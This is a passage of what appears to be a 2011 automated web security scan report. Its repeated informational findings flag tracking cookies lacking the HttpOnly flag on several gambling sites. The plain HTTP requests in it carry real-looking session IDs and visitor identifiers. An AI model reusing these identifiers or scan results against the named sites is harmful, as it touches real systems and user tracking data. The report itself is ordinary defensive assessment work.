12.238. http://www.info.crazyscratch.com/ContactUsTel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.239. http://www.info.crazyscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.240. http://www.info.crazyscratch.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.241. http://www.info.crazyscratch.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.242. http://www.info.crazyscratch.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.243. http://www.info.crazyscratch.com/Privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Privacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.244. http://www.info.crazyscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.245. http://www.info.crazyscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.246. http://www.info.crazyscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.247. http://www.info.crazyscratch.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.248. http://www.info.crazyscratch.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_28=EncryptedUniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=info.crazyscratch.com; expires=Fri, 16-May-2031 11:41:36 GMT; path=/
UniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.249. http://www.info.winnings.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.winnings.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_21=EncryptedUniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6&AffiliateID=21&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=103122733IP1x10&ProductTypeID=0; domain=info.winnings.com; expires=Fri, 16-May-2031 11:41:16 GMT; path=/
UniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.250. https://www.interwetten.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerPool_Web01-Web07=1718227372.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.251. http://www.karamba.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.252. http://www.karamba.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.253. http://www.karamba.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.254. http://www.karamba.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.255. http://www.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 11:42:44 GMT; path=/
UniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.256. http://www.karamba.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.257. http://www.karamba.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.258. http://www.karamba.com/Privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Privacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.259. http://www.karamba.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.260. http://www.karamba.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.261. http://www.karamba.com/Sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Sitemap.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.262. http://www.karamba.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.263. http://www.karamba.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
